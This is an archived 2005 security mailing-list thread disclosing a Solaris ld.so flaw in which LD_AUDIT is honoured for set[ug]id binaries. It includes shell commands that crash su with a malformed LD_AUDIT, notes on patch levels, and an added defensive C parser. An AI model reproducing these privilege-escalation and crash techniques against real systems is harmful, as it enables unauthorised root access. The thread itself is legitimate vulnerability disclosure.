View Full Version : Re: [Full-disclosure] Solaris 9/10 ld.so fun



Przemyslaw Frasunek
28/06/05, 19:15
Przemyslaw Frasunek wrote:
> ld.so from Solaris 9 and 10 doesn't check LD_AUDIT environment variable when
> running s[ug]id binaries, allowing to run arbitrary code with elevated
> privileges. Well, I can't believe that such a trivial vulnerability exists in
> modern OS...
[...]

Oh, well, it's not the end of fun with ldso.

atari:venglin:~> setenv LD_AUDIT :
atari:venglin:~> su
Segmentation fault
atari:venglin:~> unsetenv LD_AUDIT
atari:venglin:~> setenv LD_AUDIT `perl -e 'print "A"x1024'`
atari:venglin:~> su
ld.so.1: su: warning: su:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
path name too long
ld.so.1: su: warning:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
audit initialization failure: disabled
Segmentation fault


Both of the segfaults are NULL pointer dereferences. The first example works on
Solaris 8, 9 and 10. The second one only on Solaris 10. For now, it doesn't
seem to be exploitable.


--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
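
An added illustration for readers, not part of the original posts and not Solaris ld.so source: a loader-side parser for an LD_AUDIT-style value that honours nothing in a set[ug]id process and skips the two inputs shown above (a lone ":" and a 1024-byte name) instead of crashing. The function names, the 1024-byte limit and the cap of 8 entries are assumptions made for the example.

```c
/* Illustration only: not Solaris ld.so source. All names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define AUDIT_PATH_MAX 1024   /* assumed limit; a 1024-byte name is over-long */
#define MAX_AUDITORS   8      /* assumed cap on audit libraries */

struct audit_list {
    size_t count;                               /* entries accepted */
    size_t rejected;                            /* entries dropped */
    char   paths[MAX_AUDITORS][AUDIT_PATH_MAX];
};

/* A process is "secure" when it runs set[ug]id: real and effective IDs differ. */
static int process_is_secure(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* Split a colon-separated value. In a secure process nothing is accepted.
 * The output struct is always fully initialised, so callers never see
 * a NULL or stale entry. Returns the number of accepted entries. */
size_t parse_audit_env(const char *value, int secure, struct audit_list *out)
{
    memset(out, 0, sizeof *out);
    if (value == NULL || secure)
        return 0;               /* unset, or untrusted environment: load nothing */

    for (const char *p = value;;) {
        size_t len = strcspn(p, ":");
        if (len == 0 || len >= AUDIT_PATH_MAX || out->count == MAX_AUDITORS) {
            out->rejected++;    /* empty, over-long, or one too many: skip it */
        } else {
            memcpy(out->paths[out->count], p, len);
            out->paths[out->count][len] = '\0';
            out->count++;
        }
        if (p[len] == '\0')
            break;
        p += len + 1;
    }
    return out->count;
}

/* Apply the policy to the real process credentials and environment. */
size_t audit_list_from_environment(struct audit_list *out)
{
    int secure = process_is_secure(getuid(), geteuid(), getgid(), getegid());
    return parse_audit_env(getenv("LD_AUDIT"), secure, out);
}

int main(void)
{
    struct audit_list list;
    size_t n = audit_list_from_environment(&list);
    printf("accepted=%zu rejected=%zu\n", n, list.rejected);
    for (size_t i = 0; i < n; i++)
        puts(list.paths[i]);
    return 0;
}
```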

Przemyslaw Frasunek
28/06/05, 19:25
Przemyslaw Frasunek wrote:
> - SunOS 5.10 Generic i86pc i386 i86pc
> - SunOS 5.9 Generic_112233-12 sun4u

This vulnerability was introduced by one of the recent patches for Solaris 9,
possibly 112963. Ld.so patched with 112963-08 is not vulnerable -- it does
not allow LD_AUDIT for set[ug]id binaries, but upgrading to 112963-16
definitely makes ld.so exploitable.

Up-to-date Solaris 8 boxes are also vulnerable. Solaris 10 boxes are
vulnerable, both patched and unpatched.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *

Piotr KUCHARSKI
28/06/05, 22:25
On Tue, Jun 28, 2005 at 06:17:02PM +0200, Przemyslaw Frasunek wrote:
> This vulnerability was introduced by one of the recent patches for Solaris 9,
> possibly 112963. Ld.so patched with 112963-08 is not vulnerable -- it does
> not allow LD_AUDIT for set[ug]id binaries, but upgrading to 112963-16
> definitely makes ld.so exploitable.

Just patchrm-ed 112963-19 to -12, it is not working anymore.

p.

--
Beware of he who would deny you access to information, for in his
heart he dreams himself your master. -- Commissioner Pravin Lal
http://nerdquiz.sgh.waw.pl/ -- Polish version of the quiz for nerds ;)

Przemyslaw Frasunek
29/06/05, 19:45
Vulnerability was confirmed by Sun:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1

There are still no patches available, but a workaround was proposed.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *

Charles Heselton
29/06/05, 20:15

I did the same. Patchrm-ed 112963-19 to -12. It still works for me.

Uname -a :

SunOS cf-node000 5.9 Generic_118558-09 sun4u sparc SUNW,Ultra-1

--
- Charlie

5A27 58D2 C791 8769 D4A4 F316 7BF8 D1F6 4829 EDCF

> -----Original Message-----
> From: full-disclosure-bounces@lists.grok.org.uk
> [mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf
> Of Piotr KUCHARSKI
> Sent: Tuesday, June 28, 2005 10:49 AM
> To: Przemyslaw Frasunek
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: Re: [Full-disclosure] Solaris 9/10 ld.so fun
>
> On Tue, Jun 28, 2005 at 06:17:02PM +0200, Przemyslaw Frasunek wrote:
> > This vulnerability was introduced by one of the recent patches for Solaris 9,
> > possibly 112963. Ld.so patched with 112963-08 is not vulnerable -- it does
> > not allow LD_AUDIT for set[ug]id binaries, but upgrading to 112963-16
> > definitely makes ld.so exploitable.
>
> Just patchrm-ed 112963-19 to -12, it is not working anymore.
>
> p.
>
> --
> Beware of he who would deny you access to information, for in his
> heart he dreams himself your master. -- Commissioner Pravin Lal
> http://nerdquiz.sgh.waw.pl/ -- Polish version of the quiz for nerds ;)

Casper.Dik@Sun.COM
30/06/05, 02:05
>I did the same. Patchrm-ed 112963-19 to -12. It still works for me.
>
>Uname -a :
>
>SunOS cf-node000 5.9 Generic_118558-09 sun4u sparc SUNW,Ultra-1


Please verify the md5 checksums of the resulting ld.so binaries
with the Solaris fingerprint database so you are certain exactly which
version you are using.

This is what I have on file:

a684091a9d09a44bbbbd48480cf9ea6c /usr/lib/ld.so.1 SUNWcsu;sparc;11.9.0,REV=2002.04.06.15.27;112963-12


Casper

KF
04/07/05, 23:15
Przemyslaw Frasunek wrote:

>Vulnerability was confirmed by Sun:
>
>http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1
>
>There are still no patches available, but a workaround was proposed.
>
>
>

Here is an exploit for Schillix using venglin's mojo.
-KF

